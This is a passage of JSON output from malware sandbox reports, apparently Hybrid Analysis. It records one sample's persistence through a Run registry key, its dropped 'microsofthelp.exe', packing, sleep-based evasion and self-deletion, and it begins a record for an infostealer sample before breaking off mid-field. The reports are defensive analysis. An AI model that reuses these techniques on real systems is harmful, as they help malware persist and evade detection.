\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter HelpPane.exe (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter hh.exe (UID: 00000000-00005864)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegOpenKeyA\" (Indicator: \"RegOpenKey\"; File: \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\")\n Found reference to API \"RegOpenKeyA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API \"RegOpenKeyA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp, 00000000-00005864.00000000.66404.00270000.00000004.mdmp\")\n Found reference to API \"RegOpenKeyA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp, 00000000-00005864.00000000.66404.00270000.00000004.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp, 00000000-00005864.00000000.66404.00270000.00000004.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-118", "type": 2, "relevance": 1, "name": "Contains ability to query network adapter information (API string)", "description": "Found reference to API \"GetAdaptersInfo\" (Indicator: \"GetAdaptersInfo\"; File: \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\")\n Found reference to API \"GetAdaptersInfo\" (Indicator: \"GetAdaptersInfo\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API \"GetAdaptersInfo\" (Indicator: \"GetAdaptersInfo\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp, 00000000-00005864.00000000.66404.00270000.00000004.mdmp\")\n Found reference to API \"GetAdaptersInfo\" (Indicator: \"GetAdaptersInfo\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp, 00000000-00005864.00000000.66404.00270000.00000004.mdmp\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"microsofthelp.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Heuristic match: \"wsf;.wsh;.mn\"\n Heuristic match: \":\\windo]s\\stub.kg\"\n Heuristic match: \"c:\\e^huqxvx.kg\"\n Heuristic match: \"microsoft.net\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-601", "type": 2, "relevance": 1, "name": "Contains ability to communicate with network (API string)", "description": "Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp, 00000000-00005864.00000000.66404.00270000.00000004.mdmp\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")\n Found reference to API \"359255537291,5996,3221,,InternetOpenA,Wininet.dll,\"252:14:34.432\",RX=0,PX=0\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005876.00000003.75760.00290000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-539", "type": 2, "relevance": 1, "name": "Contains reference to Windows internet services (API string)", "description": "Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp, 00000000-00005864.00000000.66404.00270000.00000004.mdmp\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")\n Found reference to API \"359255537291,5996,3221,,InternetOpenA,Wininet.dll,\"252:14:34.432\",RX=0,PX=0\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005876.00000003.75760.00290000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-199", "type": 6, "relevance": 1, "name": "Calls an API used to connect to internet", "description": "\"microsofthelp.exe\" called \"InternetOpenA with parameter Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; CIBA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\" (UID: 00000000-00005876)", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "stream-139", "type": 1, "name": "Contains XOR operation loops [Stream disassembly]", "description": "Assembly shows XOR instruction xor byte ptr [ecx+esi]\n dl in Stream UID: 00000000-00005864-31702-1-0040D0B2\n Assembly shows XOR instruction xor esi\n dword ptr [edx] in Stream UID: 00000000-00005864-31702-1-0040D0B2\n Assembly shows XOR instruction xor byte ptr [ebx]\n al in Stream UID: 00000000-00005864-31702-1-0040D0B2\n Assembly shows XOR instruction xor byte ptr [ecx+esi]\n dl in Stream UID: 00000000-00005876-33596-1-0040D0B2\n Assembly shows XOR instruction xor esi\n dword ptr [edx] in Stream UID: 00000000-00005876-33596-1-0040D0B2\n Assembly shows XOR instruction xor byte ptr [ebx]\n al in Stream UID: 00000000-00005876-33596-1-0040D0B2\n Assembly shows XOR instruction xor byte ptr [ecx+esi]\n dl in Stream UID: 00000000-00001224-36783-1-0040D0B2\n Assembly shows XOR instruction xor esi\n dword ptr [edx] in Stream UID: 00000000-00001224-36783-1-0040D0B2\n Assembly shows XOR instruction xor byte ptr [ebx]\n al in Stream UID: 00000000-00001224-36783-1-0040D0B2", "origin": "Hybrid Analysis Technology", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: Contains XOR operation loops [Stream disassembly]", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains XOR operation loops [Stream disassembly]", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-31", "type": 15, "relevance": 1, "name": "Shows ability to use encryption for command and control traffic", "description": "The analysis shows use of encryption\n use of http/https that can be used to send encrypted data on command and control server. Matched sigs: Contains XOR operation loops [Stream disassembly]\n Matched sigs: Found potential URL in binary/memory\n Matched sigs: Contains ability to communicate with network (API string)", "origin": "Indicator Combinations", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\PARAMETERS\"; Key: \"TRANSPORTS\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP6\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MINSOCKADDRLENGTH\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAXSOCKADDRLENGTH\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"USEDELAYEDACCEPTANCE\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"HELPERDLLNAME\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\" has an entrypoint in section \".MPRESS2\"\n \"microsofthelp.exe.bin\" has an entrypoint in section \".MPRESS2\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "RegOpenKeyA\n GetProcAddress\n GetModuleHandleA\n InternetOpenA", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"MICROSOFTHELP\"; Value: \"%WINDIR%\\microsofthelp.exe\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" wrote 47842 bytes starting with PE header signature to file \"C:\\Windows\\microsofthelp.exe\": 4d5a40000100000002000000ffff0000ff000000000000000a000000000000000e1fff0e00ff09ff21ff014cff2157696e3332202e4558452e0d0a2440000000504500004c010200ffff174f0000000000000000ff000f030b0106000038000000380000000000004eff00000010000000500000000040000010000000020000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"microsofthelp.exe.bin\" has type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\"- [targetUID: N/A]\n \"microsofthelp.exe\" has type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\"- Location: [%WINDIR%\\microsofthelp.exe]- [targetUID: 00000000-00005864]\n \"MICROSOFTHELP.EXE.67A47CC6.bin\" has type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\" has section name .MPRESS1 with entropy \"7.84027448889\"\n \"microsofthelp.exe.bin\" has section name .MPRESS1 with entropy \"7.84027448889\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-77", "relevance": 10, "name": "PE file is packed with MPress Packer", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\" has a section named \".MPRESS1\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0\" has a section named \".MPRESS2\"\n \"microsofthelp.exe.bin\" has a section named \".MPRESS1\"\n \"microsofthelp.exe.bin\" has a section named \".MPRESS2\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-47", "type": 6, "relevance": 10, "name": "Possibly tries to evade analysis by sleeping many times", "description": "\"microsofthelp.exe\" (Thread ID: 5996) slept \"525\" times (threshold: 500)", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "stream-121", "type": 1, "relevance": 5, "name": "Contains ability to retrieve a module handle", "description": "GetModuleHandleA@KERNEL32.DLL at 00000000-00005864-31702-232-0040C57E\n GetModuleHandleA@KERNEL32.DLL at 00000000-00005876-33596-232-0040C57E\n GetModuleHandleA@KERNEL32.DLL at 00000000-00001224-36783-233-0040C57E", "origin": "Hybrid Analysis Technology", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "stream-131", "type": 1, "relevance": 5, "name": "Contains ability to retrieve the fully qualified path of module", "description": "GetModuleFileNameA@KERNEL32.DLL at 00000000-00005864-31702-1-0040D0B2\n GetModuleFileNameA@KERNEL32.DLL at 00000000-00005864-31702-17-00401C40\n GetModuleFileNameA@KERNEL32.DLL at 00000000-00005864-31702-95-004034C2\n GetModuleFileNameA@KERNEL32.DLL at 00000000-00005876-33596-95-004034C2\n GetModuleFileNameA@KERNEL32.DLL at 00000000-00005876-33596-1-0040D0B2\n GetModuleFileNameA@KERNEL32.DLL at 00000000-00005876-33596-17-00401C40\n GetModuleFileNameA@KERNEL32.DLL at 00000000-00001224-36783-1-0040D0B2\n GetModuleFileNameA@KERNEL32.DLL at 00000000-00001224-36783-95-004034C2\n GetModuleFileNameA@KERNEL32.DLL at 00000000-00001224-36783-17-00401C40", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"microsofthelp.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"microsofthelp.exe\" marked \"C:\\75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"microsofthelp.exe\" opened \"C:\\75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\microsofthelp.exe\" (Handle: 144)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\microsofthelp.exe\" (Handle: 144)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\microsofthelp.exe\" (Handle: 144)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "binary-7", "type": 8, "relevance": 7, "name": "Drops executable files to the Windows system directory", "description": "File type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\" was dropped at \"%WINDIR%\\microsofthelp.exe\"", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500
https://hybrid-analysis.com/sample/9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500
Hybrid Analysis - Infostealers
{"size": 3472896, "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "submit_name": "9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500", "sha256": "9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500", "av_detect": 85, "vx_family": "Win/malicious_confidence_100%", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 111, "extracted_files": [{"name": "Geforce BeamMP.exe", "file_size": 3472896, "sha256": "9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500", "type_tags": ["peexe", "assembly", "executable"], "description": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe (PID: 5912)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005912", "name": "9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe", "normalized_path": "C:\\9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe", "sha256": "9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": 